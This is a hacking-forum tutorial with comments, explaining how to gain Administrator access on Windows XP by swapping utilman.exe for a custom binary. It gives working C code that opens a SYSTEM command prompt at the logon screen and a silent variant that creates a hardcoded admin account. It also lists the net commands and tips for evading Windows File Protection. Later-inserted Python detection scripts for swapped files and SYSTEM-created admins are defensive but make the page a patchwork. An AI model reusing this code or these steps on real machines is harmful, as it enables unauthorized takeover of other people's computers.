HellBoundHackers
Create an Admin account through utilman.exe on Windows XP

A user can create an Administrator account on a local Windows XP machine by replacing the utilman.exe file in System32 with a program of their own.



Disclaimer: This article is for educational purposes only. I take no responsibility for any actions that result from misuse of the information in it. The code in this article is not my own; the article only shows the steps for using it to gain Administrator access.

*********************************************

Alright, so there are many ways to gain Administrator access on a local machine, but this one has not been covered here yet. Not only will you get Administrator access, you will get a whole new account.

To start, we will be replacing the utilman.exe file. What is utilman.exe? Utilman is the Windows Utility Manager, the small program that offers the accessibility tools such as Magnifier, Narrator and the On-Screen Keyboard. The part that matters for us is that it is not an ordinary program you run after logging in: Winlogon launches it when Windows key + U is pressed at the logon screen, before anyone has logged on, so it runs as LocalSystem (SYSTEM). Whatever binary sits at C:\Windows\System32\utilman.exe gets started with that privilege. Very nice for what we want to accomplish.

Now that we know what it is, how do we use it to gain Admin access? First we need to do some coding. Here is the code to compile with a C/C++ compiler; I used Borland C++ 5.5, a quick, free and easy compiler. All the program does is start cmd.exe on the Winlogon desktop (the desktop the logon screen is drawn on), so the console appears in front of the logon prompt and inherits the SYSTEM token of the utilman.exe that launched it.

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <tchar.h>

/* Drop-in replacement for utilman.exe. Winlogon starts utilman.exe as
 * SYSTEM when Win+U is pressed at the logon screen, so the cmd.exe we
 * spawn here runs as SYSTEM too. lpDesktop must name the Winlogon
 * desktop; otherwise the console opens on a desktop nobody can see. */
int main(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    /* CreateProcess may write into lpCommandLine, so it needs a writable copy */
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

    ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;
    ZeroMemory(&p, sizeof(p));

    if (!CreateProcess(NULL, szCmdline, NULL, NULL, FALSE,
                       CREATE_NEW_CONSOLE, NULL, NULL, &s, &p)) {
        /* there is no console to show this on at the logon screen, but a
         * non-zero exit code makes a failed run visible in Task Manager logs */
        fprintf(stderr, "CreateProcess failed: %lu\n", GetLastError());
        free(szCmdline);
        free(szDesktop);
        return 1;
    }

    /* we do not need to wait for cmd.exe; just drop our handles and exit */
    CloseHandle(p.hProcess);
    CloseHandle(p.hThread);
    free(szCmdline);
    free(szDesktop);
    return 0;
}

Copy and paste this code into a text file named "utilman.c". Compile it and you have a file called utilman.exe. Now the most important part: you need write access to the C:\Windows\System32 folder on the local machine. Normally only Administrators and SYSTEM have that, which is why this is usually done from an existing admin account or by booting the machine from other media. If you have it, you're in great condition. If you don't, read the other articles here about how to gain access to restricted directories.

Now that we have access to the directory, rename utilman.exe in the \System32 folder to something like "utilman.exe.bak". Always back up your files! Then copy your compiled utilman.exe into the \System32 directory. One caveat: utilman.exe is covered by Windows File Protection, which keeps a reference copy in C:\Windows\System32\dllcache and will quietly put the original back from there when it notices the change (the comments below link to write-ups on getting past WFP). Check that your file is still in place a minute or so later before you go on. Then restart the computer.
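The same dllcache copy that makes WFP a nuisance here is also the easiest reference for the other side: to find out whether a box's utilman.exe (or any other protected file) has already been swapped, hash the live System32 file and compare it with the dllcache copy. The script below is an added example and not part of the original article; it assumes the standard XP layout (%SystemRoot%\system32 and %SystemRoot%\system32\dllcache) and generalises the check from utilman.exe to every file that has a dllcache copy.

```python
import hashlib
import os
from pathlib import Path


def sha256_of(path):
    """Hex SHA-256 of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def diff_protected(cached, live):
    """Compare the digests of the dllcache copies (name -> sha256) with the
    digests of the live System32 files. Returns a sorted list of
    (name, "missing" | "modified") for every protected file whose live copy
    is absent or differs. Files that exist only in System32 are ignored:
    dllcache is the reference, System32 is what we are checking."""
    findings = []
    for name, reference in cached.items():
        current = live.get(name)
        if current is None:
            findings.append((name, "missing"))
        elif current != reference:
            findings.append((name, "modified"))
    return sorted(findings)


def digests_in(directory, names=None):
    """name -> sha256 for the regular files in `directory`, or only those
    listed in `names`. Names are lower-cased, as NTFS is case-insensitive."""
    directory = Path(directory)
    wanted = {n.lower() for n in names} if names is not None else None
    out = {}
    for p in directory.iterdir():
        if p.is_file() and (wanted is None or p.name.lower() in wanted):
            out[p.name.lower()] = sha256_of(p)
    return out


def find_replaced_protected_files(system32, dllcache, names=None):
    """Hash every dllcache copy (or only `names`) and report the System32
    files that no longer match it."""
    cached = digests_in(dllcache, names)
    live = digests_in(system32, list(cached))
    return diff_protected(cached, live)


if __name__ == "__main__":
    # Assumed XP layout; SystemRoot is read from the environment when present.
    root = Path(os.environ.get("SystemRoot", r"C:\Windows"))
    sys32 = root / "system32"
    if not (sys32 / "dllcache").is_dir():
        print("no dllcache directory found; is this a Windows XP system?")
    else:
        for name, state in find_replaced_protected_files(sys32, sys32 / "dllcache", ["utilman.exe"]):
            print(f"{name}: {state}")
```

Drop the `["utilman.exe"]` argument to sweep everything in dllcache. Keep in mind what the check trusts: someone who also replaced the dllcache copy, which is exactly what the WFP bypasses mentioned in the comments do, will pass it, so a clean result only means the two copies agree. For a real verdict, compare against hashes taken from known-good media or from another machine at the same patch level.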

After the reboot you will be brought to the logon screen. If the classic logon prompt is not active, hold Ctrl+Alt and press Delete twice to switch to it. Now press Windows key + U. If you have done everything correctly up to this point, you will be looking at a command prompt running as SYSTEM. As SYSTEM we can add accounts to the local machine. Type the following into the prompt:

net user "username you want" "password you want" /add

Ex. net user aVoid hacker /add

Press Enter.

Our account is created; now we need to add it to the Administrators group. Enter this command to do that:

net localgroup administrators "username you specified earlier" /add

Ex. net localgroup administrators aVoid /add

Press Enter.

Now we have an Administrator account!! Minimize or exit the command prompt and log in to Windows with the username and password you chose.

Congratulations, you have access to the local machine as Administrator!! Now go back to the \System32 folder and rename the backup copy of utilman.exe back to utilman.exe (and restore the dllcache copy too if you replaced it).

Ex. "utilman.exe.bak" back to "utilman.exe"

Note: If Windows refuses with an access or "file in use" error, open Task Manager and end the utilman.exe process first.


*********************************************

If you don't want to type all that out in the command prompt, compile this C code instead of the previous one. It runs the same two net commands itself, so nothing visible appears at the logon screen.


#include <stdlib.h>

/* Silent variant: no console appears. Winlogon runs this as SYSTEM when
 * Win+U is pressed at the logon screen, so both net commands succeed.
 * Change the username ("hacker") and password ("hack") before compiling. */
int main(void)
{
    system("net user hacker hack /add");
    system("net localgroup administrators hacker /add");
    return 0;
}

Note: the signature is int main(void), so the compiler will not warn about unused argc and argv parameters.

After you compile this code, follow the same steps as before. When you get to the logon prompt, switch to the classic prompt and press Windows key + U. You will not see a command prompt this time!! Simply log in with the username and password you set in the code. If you didn't change them, the defaults are username: hacker / password: hack. Remember to restore the backup of utilman.exe!!
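On the defensive side, both variants above (the net commands typed at the prompt, and the silent program that runs them) leave the same distinctive trace in the Security log: a local account created, and then added to Administrators, by NT AUTHORITY\SYSTEM rather than by a logged-on administrator, because the process that ran them was spawned by Winlogon. The script below is an added example and not part of the original article. Its event records are a constructed, simplified stand-in for the XP audit events 624 (user account created) and 636 (member added to a security-enabled local group), which are 4720 and 4732 on Vista and later; the computer name WINXP and all SIDs are made up, and the five-minute window is an arbitrary tuning choice.

```python
"""Flag a local account that SYSTEM created and then put into Administrators
shortly afterwards: the audit trail of the net commands in this article when
they run from a utilman.exe swapped in at the logon screen."""
from dataclasses import dataclass
from datetime import datetime, timedelta

SYSTEM_SID = "S-1-5-18"              # NT AUTHORITY\SYSTEM
ADMINISTRATORS_SID = "S-1-5-32-544"  # BUILTIN\Administrators
WINDOW = timedelta(minutes=5)        # arbitrary: how close the two events must be


@dataclass
class Event:
    """Simplified security event (constructed for this example, not the exact
    XP event text). 624 = user account created, 636 = member added to a
    security-enabled local group; 4720/4732 on Vista and later."""
    time: datetime
    event_id: int
    subject_sid: str        # account that performed the action
    subject_name: str
    new_account: str = ""   # 624: New Account Name
    new_sid: str = ""       # 624: New Account ID
    member_sid: str = ""    # 636: Member ID (SID of the account added)
    group_sid: str = ""     # 636: SID of the group the member joined


def find_system_created_admins(events, window=WINDOW):
    """Return one hit per account that SYSTEM created (624) and then placed in
    Administrators (636) within `window`. Events may arrive out of order."""
    created = {}   # new account SID -> (time, name), for 624 events by SYSTEM
    hits = []
    for e in sorted(events, key=lambda x: x.time):
        if e.subject_sid != SYSTEM_SID:
            continue  # a logged-on admin doing the same thing is routine
        if e.event_id == 624 and e.new_sid:
            created[e.new_sid] = (e.time, e.new_account)
        elif e.event_id == 636 and e.group_sid == ADMINISTRATORS_SID:
            c = created.get(e.member_sid)
            if c is not None and e.time - c[0] <= window:
                hits.append({"account": c[1], "created": c[0],
                             "elevated": e.time, "by": e.subject_name})
    return hits


# Constructed sample log: one benign admin action, the article's sequence,
# and a SYSTEM-created account that is never elevated.
_T0 = datetime(2006, 12, 15, 19, 0, 0)
SAMPLE_EVENTS = [
    Event(_T0, 624, "S-1-5-21-1-2-3-1001", "alice",
          new_account="helpdesk", new_sid="S-1-5-21-1-2-3-1010"),
    Event(_T0 + timedelta(seconds=20), 636, "S-1-5-21-1-2-3-1001", "alice",
          member_sid="S-1-5-21-1-2-3-1010", group_sid=ADMINISTRATORS_SID),
    # net user aVoid hacker /add, then net localgroup administrators aVoid /add,
    # run from the Winlogon-spawned cmd.exe as SYSTEM (subject is the machine account)
    Event(_T0 + timedelta(minutes=3), 624, SYSTEM_SID, "WINXP$",
          new_account="aVoid", new_sid="S-1-5-21-1-2-3-1011"),
    Event(_T0 + timedelta(minutes=3, seconds=15), 636, SYSTEM_SID, "WINXP$",
          member_sid="S-1-5-21-1-2-3-1011", group_sid=ADMINISTRATORS_SID),
    Event(_T0 + timedelta(hours=1), 624, SYSTEM_SID, "WINXP$",
          new_account="svc_backup", new_sid="S-1-5-21-1-2-3-1012"),
]

if __name__ == "__main__":
    for h in find_system_created_admins(SAMPLE_EVENTS):
        print(f"{h['account']}: created {h['created']:%H:%M:%S} by {h['by']}, "
              f"in Administrators at {h['elevated']:%H:%M:%S}")
```

The rule only fires when account-management auditing is enabled (it is not by default on an XP workstation), and it keys on the subject being SYSTEM, which is what sets the logon-screen trick apart from an administrator running the same two commands. Management agents or deployment tools that legitimately create local admins from a service context will trip it too, so expect to whitelist a few subject names in a real environment.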

Hope you enjoyed this article! Sorry it's so lengthy, but I tried to write it so that even the most novice computer users will be able to follow it.

Happy Hacking!
aVoid

Comments

adlez on December 15 2006 - 19:25:48
It's ok except it's a bit sk1ddy. I mean, could you explain what the C program is doing? I'm assuming it runs cmd as a process or something when the comp starts up. But I dunno, so I'll give you a chance to explain it, then I'll rate it. ;)
sillywilly on December 15 2006 - 23:10:06
Very nice and easy to read!! Will be trying this soon! TY
korg on December 16 2006 - 00:58:58
Already have this but you're missing some things. Looks real familiar: http://didierstev. . .g/hacking/. Search the site, it gives more examples.
Neuromancer on January 11 2007 - 01:27:51
this thing doesn't work. seriously, I've been f$%/ing with it all night. so, the problem lies in the SFC (the Windoze file checking library). it prevents you from altering utilman.exe and making the cmd. try it, the bastard pops up all over again. so, as I've been googling and reading about this for the past couple of hours or so, here's a working page that describes how to get past the SFC. very interesting stuff. http://www.bitsum. . .outwfp.asp didierstevens is a nice blog, but the explanation is not very complete - it tells you 'how' but it doesn't tell you 'why'. so, to get this hack done (and understand it), you'll need the blog provided in the comments and the site that I gave. happy hacking. N
Neuromancer on January 11 2007 - 13:55:45
yep, done it today. works. thanks for the article. :happy:
revolt0163 on March 08 2007 - 11:40:48
or you could just try using at, in the command prompt